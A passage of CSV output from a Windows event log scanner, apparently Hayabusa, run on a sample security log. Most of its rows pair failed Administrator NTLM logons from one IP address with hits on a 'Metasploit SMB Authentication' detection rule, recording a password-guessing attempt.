Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 